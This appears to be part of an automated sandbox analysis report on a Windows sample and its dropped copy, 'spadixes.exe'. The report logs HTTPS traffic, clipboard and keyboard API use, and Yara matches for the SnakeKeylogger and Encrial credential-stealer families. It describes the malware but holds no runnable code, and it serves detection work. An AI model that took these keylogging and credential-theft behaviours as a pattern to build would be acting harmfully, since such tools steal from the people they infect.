                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49814 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49913 version: TLS 1.2
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B2EAFF
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B2ED6A
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0095ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0095ED6A
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B2EAFF
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B1AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00B1AA57
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B49576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B49576
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00979576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00979576

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000003.00000002.3368516346.0000000000423000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Binary is likely a compiled AutoIt script file
                Source: RubzLi27lr.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: RubzLi27lr.exe, 00000000.00000000.2117780186.0000000000B72000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_be581c15-b
                Source: RubzLi27lr.exe, 00000000.00000000.2117780186.0000000000B72000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_40089da8-9
                Source: RubzLi27lr.exe, 00000000.00000003.2143032867.00000000040C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d3cc4b03-c
                Source: RubzLi27lr.exe, 00000000.00000003.2143032867.00000000040C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_09a230d1-8
                Source: spadixes.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: spadixes.exe, 00000002.00000000.2143304528.00000000009A2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f26e27dc-5
                Source: spadixes.exe, 00000002.00000000.2143304528.00000000009A2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0eb540d9-b
                Source: spadixes.exe, 00000008.00000000.2305246647.00000000009A2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_78af4dad-1
                Source: spadixes.exe, 00000008.00000000.2305246647.00000000009A2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_11fd0278-d
                Source: RubzLi27lr.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f9d26a5a-c
                Source: RubzLi27lr.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_202aea98-c
                Source: spadixes.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9bc85776-3
                Source: spadixes.exe.0.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_73cb6784-e
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B1D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00B1D5EB
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B11201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B11201
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B1E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B1E8F6
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0094E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_0094E8F6
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AB80600_2_00AB8060
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B220460_2_00B22046
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B182980_2_00B18298
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AEE4FF0_2_00AEE4FF
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AE676B0_2_00AE676B
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B448730_2_00B44873
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00ADCAA00_2_00ADCAA0
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00ABCAF00_2_00ABCAF0
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00ACCC390_2_00ACCC39
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AE6DD90_2_00AE6DD9
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AB91C00_2_00AB91C0
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00ACB1190_2_00ACB119
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AD13940_2_00AD1394
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AD781B0_2_00AD781B
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AB79200_2_00AB7920
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AC997D0_2_00AC997D
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AD7A4A0_2_00AD7A4A
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AD7CA70_2_00AD7CA7
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AE9EEE0_2_00AE9EEE
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B3BE440_2_00B3BE44
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_0180F0E80_2_0180F0E8
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_009520462_2_00952046
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_008E80602_2_008E8060
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_009482982_2_00948298
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0091E4FF2_2_0091E4FF
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0091676B2_2_0091676B
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_009748732_2_00974873
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0090CAA02_2_0090CAA0
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_008ECAF02_2_008ECAF0
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_008FCC392_2_008FCC39
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00916DD92_2_00916DD9
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_008E91C02_2_008E91C0
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_008FB1192_2_008FB119
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_009013942_2_00901394
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0090781B2_2_0090781B
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_008E79202_2_008E7920
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_008F997D2_2_008F997D
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00907A4A2_2_00907A4A
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00907CA72_2_00907CA7
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00919EEE2_2_00919EEE
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0096BE442_2_0096BE44
